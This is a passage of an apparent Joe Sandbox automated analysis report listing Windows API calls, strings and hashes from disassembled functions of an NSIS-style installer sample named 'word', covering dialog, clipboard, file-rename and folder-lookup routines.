                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405200
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405213
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405221
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405234
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405256
                                                          • ShowWindow.USER32(?,?), ref: 0040526A
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040528B
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040529B
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B4
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052C0
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405198
                                                            • Part of subcall function 00404021: SendMessageA.USER32(?,?,00000001,00403E52), ref: 0040402F
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052DC
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000050AE,00000000), ref: 004052EA
                                                          • CloseHandle.KERNEL32(00000000), ref: 004052F1
                                                          • ShowWindow.USER32(00000000), ref: 00405314
                                                          • ShowWindow.USER32(?,?), ref: 0040531B
                                                          • ShowWindow.USER32(?), ref: 00405361
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405395
                                                          • CreatePopupMenu.USER32 ref: 004053A6
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053BB
                                                          • GetWindowRect.USER32(?,000000FF), ref: 004053DB
                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004053F4
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405430
                                                          • OpenClipboard.USER32(00000000), ref: 00405440
                                                          • EmptyClipboard.USER32 ref: 00405446
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040544F
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405459
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405486
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00405491
                                                          • CloseClipboard.USER32 ref: 00405497
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: fdb75e8004b8a962cc111e39fdc512337dd08274530e00a83830c09f1a41fc8c
                                                          • Instruction ID: 0982c58dd6aff3abb9cbe356e138a5b54def650ce905af7e846a86ee5d5c2f58
                                                          • Opcode Fuzzy Hash: fdb75e8004b8a962cc111e39fdc512337dd08274530e00a83830c09f1a41fc8c
                                                          • Instruction Fuzzy Hash: 43A15BB1900208BFDB219FA0DD89AAE7F79FB08345F00407AFA04B61A0C7B55E51DF69
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
                                                          • ShowWindow.USER32(?), ref: 00403B72
                                                          • DestroyWindow.USER32 ref: 00403B86
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
                                                          • GetDlgItem.USER32(?,?), ref: 00403BC3
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403BDE
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403C8C
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403C96
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403DA7
                                                          • ShowWindow.USER32(00000000,?), ref: 00403DC8
                                                          • EnableWindow.USER32(?,?), ref: 00403DDA
                                                          • EnableWindow.USER32(?,?), ref: 00403DF5
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
                                                          • EnableMenuItem.USER32(00000000), ref: 00403E12
                                                          • SendMessageA.USER32(?,?,00000000,00000001), ref: 00403E2A
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
                                                          • lstrlenA.KERNEL32(0041FCF8,?,0041FCF8,00422F00), ref: 00403E66
                                                          • SetWindowTextA.USER32(?,0041FCF8), ref: 00403E75
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403FA9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: 7a9b3478a056a8be47fe98105da4df115e2d466b78babc3a57200212fb962581
                                                          • Instruction ID: 153bf0bbc826156ff643e1a37e17b62c3978853f10e30dc38cd17efbe60f3484
                                                          • Opcode Fuzzy Hash: 7a9b3478a056a8be47fe98105da4df115e2d466b78babc3a57200212fb962581
                                                          • Instruction Fuzzy Hash: 00C1D071A04205BBDB21AF21ED44E2B7EBCFB4470AF40443EF601B11E1C7799942AB6E
                                                          APIs
                                                            • Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
                                                            • Part of subcall function 0040601C: LoadLibraryA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406039
                                                            • Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A
                                                          • lstrcatA.KERNEL32(0042A000,0041FCF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCF8,00000000,00000002,0042A400,77583410,00429000,00000000), ref: 00403802
                                                          • lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,00429400,0042A000,0041FCF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCF8,00000000,00000002,0042A400), ref: 00403877
                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
                                                          • GetFileAttributesA.KERNEL32(004226A0), ref: 00403895
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004038DE
                                                            • Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C
                                                          • RegisterClassA.USER32(00422EA0), ref: 0040391B
                                                          • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403933
                                                          • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
                                                          • ShowWindow.USER32(00000005,00000000), ref: 0040399E
                                                          • LoadLibraryA.KERNEL32(RichEd20), ref: 004039AF
                                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
                                                          • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
                                                          • RegisterClassA.USER32(00422EA0), ref: 004039E0
                                                          • DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 914957316-2904746566
                                                          • Opcode ID: 2c8fcd0ffdc3b56b974025b52fd685b926a410c3d438551c25561f7e8452b5b9
                                                          • Instruction ID: 105b881253acfb20a149285e15a71ffac9a88723c4648682b83d6f47b67848ff
                                                          • Opcode Fuzzy Hash: 2c8fcd0ffdc3b56b974025b52fd685b926a410c3d438551c25561f7e8452b5b9
                                                          • Instruction Fuzzy Hash: CC61D6B16442007EE720AF619D45F273EACEB8475AF40407FF945B22E1D67CAD02DA2E
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
                                                          • GetSysColor.USER32(?), ref: 00404203
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
                                                          • lstrlenA.KERNEL32(?), ref: 00404224
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004042AA
                                                          • SendMessageA.USER32(00000000), ref: 004042AD
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042D8
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00404327
                                                          • SetCursor.USER32(00000000), ref: 00404330
                                                          • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404350
                                                          • SetCursor.USER32(00000000), ref: 00404353
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
                                                          • SendMessageA.USER32(?,00000000,00000000), ref: 00404393
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: N$open
                                                          • API String ID: 3615053054-904208323
                                                          • Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                                          • Instruction ID: e12ca537bcd72e8a05bc460f10c87f41301461b9037796019f3247b39f6fe1bc
                                                          • Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                                          • Instruction Fuzzy Hash: 9361A0B1A40209BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99
                                                          APIs
                                                          • lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A39
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A5D
                                                          • GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405A66
                                                            • Part of subcall function 004058E7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
                                                            • Part of subcall function 004058E7: lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929
                                                          • GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405A83
                                                          • wsprintfA.USER32 ref: 00405AA1
                                                          • GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,?,00421E88,?,?,?,?,?), ref: 00405ADC
                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405AEB
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B23
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B79
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B8B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405B92
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405B99
                                                            • Part of subcall function 00405982: GetFileAttributesA.KERNEL32(00000003,00402CBC,0042AC00,80000000,00000003), ref: 00405986
                                                            • Part of subcall function 00405982: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %s=%s$NUL$[Rename]
                                                          • API String ID: 1265525490-4148678300
                                                          • Opcode ID: c8a267702ebf4a0dd0b5cf137004853b7e3688b0ba155f7c40b755ef58841ffd
                                                          • Instruction ID: b425f8375b2a923a6c6e646106298c69547d2110189afc57e8bc93149b7758b2
                                                          • Opcode Fuzzy Hash: c8a267702ebf4a0dd0b5cf137004853b7e3688b0ba155f7c40b755ef58841ffd
                                                          • Instruction Fuzzy Hash: 2D41EE71A04A15AFD2206B219C49F6B3A6CDF45725F14013ABE06F62D2DA7CB8008E7D
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                                          • Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
                                                          • Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                                          • Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404479
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004044A3
                                                          • SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040455F
                                                          • lstrcmpiA.KERNEL32(004226A0,0041FCF8), ref: 00404591
                                                          • lstrcatA.KERNEL32(?,004226A0), ref: 0040459D
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF
                                                            • Part of subcall function 004054E9: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 004054FC
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FB4
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FC6
                                                            • Part of subcall function 00405F5C: CharPrevA.USER32(?,?,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FD6
                                                          • GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466A
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404685
                                                          • SetDlgItemTextA.USER32(00000000,00000400,0041ECB8), ref: 004046FE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A
                                                          • API String ID: 2246997448-3554254475
                                                          • Opcode ID: 49aa2d54947e3dfcb73cf5b498707616a801c81160403307e0dcdfcf6ee43659
                                                          • Instruction ID: 255f07ea732f9d77aa63c61f9e9bd72d052a515538c5e386bff86aa800b3dd0f
                                                          • Opcode Fuzzy Hash: 49aa2d54947e3dfcb73cf5b498707616a801c81160403307e0dcdfcf6ee43659
                                                          • Instruction Fuzzy Hash: 5A9172B1900219BBDB11AFA1CD85AAF76B8EF85304F10843BFB01B72D1D77C99418B69
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402C8D
                                                          • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402CA9
                                                            • Part of subcall function 00405982: GetFileAttributesA.KERNEL32(00000003,00402CBC,0042AC00,80000000,00000003), ref: 00405986
                                                            • Part of subcall function 00405982: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402CF2
                                                          • GlobalAlloc.KERNEL32(?,00409130), ref: 00402E39
                                                          Strings
                                                          • soft, xrefs: 00402D69
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                                          • Error launching installer, xrefs: 00402CC9
                                                          • Null, xrefs: 00402D72
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                                          • Inst, xrefs: 00402D60
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-3016655952
                                                          • Opcode ID: 032b80d595d8a3652c003b9594642cc32fc66d4423432ee22d3093834af6a84a
                                                          • Instruction ID: a3297f7e43c120df5600b6fd5f4255024b2ca4e5a22dc20eb426d949fad314b7
                                                          • Opcode Fuzzy Hash: 032b80d595d8a3652c003b9594642cc32fc66d4423432ee22d3093834af6a84a
                                                          • Instruction Fuzzy Hash: E661C671A40205ABDF20AF64DE89B9A76B4EF00315F60413BF904B72D1D7BC9E419BAD
                                                          APIs
                                                          • GetVersion.KERNEL32(?,0041F4D8,00000000,00405014,0041F4D8,00000000), ref: 00405DC4
                                                          • GetSystemDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E3F
                                                          • GetWindowsDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E52
                                                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8E
                                                          • SHGetPathFromIDListA.SHELL32(00000000,004226A0), ref: 00405E9C
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00405EA7
                                                          • lstrcatA.KERNEL32(004226A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EC9
                                                          • lstrlenA.KERNEL32(004226A0,?,0041F4D8,00000000,00405014,0041F4D8,00000000), ref: 00405F1B
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E0E
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EC3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-730719616
                                                          • Opcode ID: ffb84532ba3a24a3ea8a32de3f89afa34c56be386775d3c5952a40cdf428d046
                                                          • Instruction ID: c546ec396b89b09005d3c5f1d9b4a4bf58d4ceda60e07cc515ef6374c73a2cb0
                                                          • Opcode Fuzzy Hash: ffb84532ba3a24a3ea8a32de3f89afa34c56be386775d3c5952a40cdf428d046
                                                          • Instruction Fuzzy Hash: 07610471A04A02AAEF216F64DC847BF3B64DB51305F50813BE941B62D1D37C8A42DF9E
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00404070
                                                          • GetSysColor.USER32(00000000), ref: 0040408C
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404098
                                                          • SetBkMode.GDI32(?,?), ref: 004040A4
                                                          • GetSysColor.USER32(?), ref: 004040B7
                                                          • SetBkColor.GDI32(?,?), ref: 004040C7
                                                          • DeleteObject.GDI32(?), ref: 004040E1
                                                          • CreateBrushIndirect.GDI32(?), ref: 004040EB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                          • Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
                                                          • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                          • Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65
                                                          APIs
                                                            • Part of subcall function 00405982: GetFileAttributesA.KERNEL32(00000003,00402CBC,0042AC00,80000000,00000003), ref: 00405986
                                                            • Part of subcall function 00405982: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 004026D7
                                                          • CloseHandle.KERNEL32(?), ref: 0040275D
